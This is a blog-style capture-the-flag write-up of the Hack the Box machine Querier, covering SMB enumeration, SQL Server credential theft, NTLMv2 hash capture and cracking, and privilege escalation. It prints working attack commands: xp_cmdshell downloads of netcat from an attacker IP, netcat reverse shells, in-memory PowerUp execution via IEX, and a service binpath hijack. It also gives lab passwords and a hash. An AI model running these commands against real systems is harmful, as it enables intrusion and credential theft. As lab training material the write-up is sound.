Post

Querier

Posted
By Peter Soverns 4 min read

Overview

Querier is a vulnerable machine from Hack the Box that requires some smb enumeration and using SQL server authentication. The foothold is accomplished after logging into SQL Server, dumping a hash, cracking the hash, and using the credentials to get a shell. The privilege escalation is accomplished through enumerating the host for interesting files, and one file has a plain text password stored. There is another path through abusing a service that we have permissions to modify, and can set it to execute a shell.

Nmap Scan

sudo nmap -sS -p- 10.10.10.125 -vvv

  • 135/tcp open msrpc syn-ack ttl 127
  • 139/tcp open netbios-ssn syn-ack ttl 127
  • 445/tcp open microsoft-ds syn-ack ttl 127
  • 1433/tcp open ms-sql-s syn-ack ttl 127
  • 5985/tcp open wsman syn-ack ttl 127
  • 47001/tcp open winrm syn-ack ttl 127

name: Microsoft SQL Server 2017 RTM

number: 14.00.1000.00

Basic Enumeration

Enumeration the smb shares, we can see there are 4 potential shares for us to look into:

1
2
3
4
5
6

Sharename       Type      Comment
---------       ----      -------
ADMIN$          Disk      Remote Admin
C$              Disk      Default share
IPC$            IPC       Remote IPC
Reports         Disk
  • Looking into the Reports smb share, we find a file, Currency Volume Report.xlsm.
  • We can use something like Libre Office to view the file. There is also another tool called binwalk to dump out the contents of the file. There is a Visual Basic script in the file: ```vb Rem Attribute VBA_ModuleType=VBADocumentModule Option VBASupport 1

’ macro to pull data for client volume reports ‘ ‘ further testing required

Private Sub Connect()

Dim conn As ADODB.Connection Dim rs As ADODB.Recordset

Set conn = New ADODB.Connection conn.ConnectionString = “Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6” conn.ConnectionTimeout = 10 conn.Open

If conn.State = adStateOpen Then

’ MsgBox “connection successful”

‘Set rs = conn.Execute(“SELECT * @@version;”) Set rs = conn.Execute(“SELECT * FROM volume;”) Sheets(1).Range(“A1”).CopyFromRecordset rs rs.Close

End If

End Sub

1
2
3
4
5
6
7
8
9
10
11
12

Looking through the contents of this Macro, the uid is `reporting`, and the Server is `QUERIER`. We also have a password, `PcwTWTHRwryjc$c6`. Impacket has a script, `mssqlclient`, that will allow us to connect to the SQL Server. 

* `impacket-mssqlclient QUERIER/reporting:'PcwTWTHRwryjc$c6'@10.10.10.125 -windows-auth`
    * Since we cannot get a shell with `enable_xp_cmdshell`, we will need to query the data manually.
    * Resource to learn more about enumerating in MS SQL: https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server

We can set up `immpacket-smbserver` to dump potential hashes from the machine: 
* `impacket-smbserver -smb2support share ~/Documents/HTB/Querier/share`
* `exec xp_dirtree ‘\\<attack ip>\share’,1,1`

It dumped out a hash for the user `mssql-svc`:

mssql-svc::QUERIER:aaaaaaaaaaaaaaaa:35c6bfe9d6aa1cbd0e6597448cd34712:0101000000000000802f8a773c72da0108fda96a635ab86e000000000100100054006a0063004c004200660045006f000300100054006a0063004c004200660045006f000200100045006d005800770075005700460072000400100045006d0058007700750057004600720007000800802f8a773c72da0106000400020000000800300030000000000000000000000000300000c76febbce075379824374588fb2b171d6615d638f3c7eb4ebbdde1a9f4f961ce0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e003200000000000000000000000000

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31

This type of hash is a `ntlmv2 hash`. More information on how to capture credentials like this and why it works can be found [here](https://medium.com/@markmotig/how-to-capture-mssql-credentials-with-xp-dirtree-smbserver-py-5c29d852f478). 

* We crack the hash with `hashcat`, using module `5600` for ntlmv2, and get: `corporate568`
* Before, we had authenticated as an anonymous user, and how we can re-authenticate back to the server as the service account. 

## Foothold
Now with our credentials, we can see if the service account `MSSQL-SVC` can run the command to enable a command shell: `enable_xp_cmshell`.

* Since this works, we can now get more data, and transfer over a file to get a real shell on the host. 
* Netcat is nice, so we use that, and have it execute a call back to our attacker machine: 
    * `xp_cmdshell powershell -c Invoke-WebRequest "http://10.10.16.2:8000/nc64.exe" -OutFile "C:\Reports\nc64.exe"`
    * `xp_cmdshell C:\Reports\nc64.exe -e cmd.exe 10.10.16.2 4444`

We are now on the machine with netcat, and can access our `user.txt`.

![User](https://github.com/Dathalind/dathalind.github.io/blob/main/assets/img/querier/Querier_User.png?raw=true)

## Local Enumeration
With our shell, we can bring over a script like `PowerUp.ps1`, and run it to check for some easy exploits. You will want to modify the script and add `Invoke-AllChecks` at the end of the script so this will automatically happen after you bring it over: 
* `cmd.exe /c powershell "IEX(New-Object Net.WebClient).DownloadString('http://10.10.16.2:8000/PowerUp.ps1')"`

This script immediately finds a file with plain text credentials in it:
```powershell
[*] Checking for cached Group Policy Preferences .xml files....

Changed   : {2019-01-28 23:12:48}
UserNames : {Administrator}
NewName   : [BLANK]
Passwords : {MyUnclesAreMarioAndLuigi!!1!}
File      : C:\ProgramData\Microsoft\Group
Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml

Privilege Escalation

Now that we have the admin password, we should be able to easily use the psexec from impacket to sign in and own this box:

  • impacket-psexec 'Administrator:MyUnclesAreMarioAndLuigi!!1!@10.10.10.125'
  • We are nt authority\system, and can read root.txt.

Another method that was found by PowerUp.ps1, is pointing to a service we have permissions to modify:

1
2
3
4
5
6
7

[*] Checking service permissions...

ServiceName   : UsoSvc
Path          : C:\Windows\system32\svchost.exe -k netsvcs -p
StartName     : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'UsoSvc'
CanRestart    : True

We can view more information on this service by running sc qc UsoSvc. This shows us we can modify what this executes. We can replace this service to execute netcat for us to get a shell back.

  • sc config UsoSvc binpath=”C:\Reports\nc64.exe -e cmd.exe 10.10.16.2 5555”
  • Then, we have to run sc stop UsoSvc, and sc start UsoSvc. We have another shell back as nt authority\system.

Root

ctf, security, hacking, exploits, sql server, information disclosure, weak credentials, anonymous access
ctf security hacking exploits sql server information disclosure weak credentials anonymous access
This post is licensed under CC BY 4.0 by the author.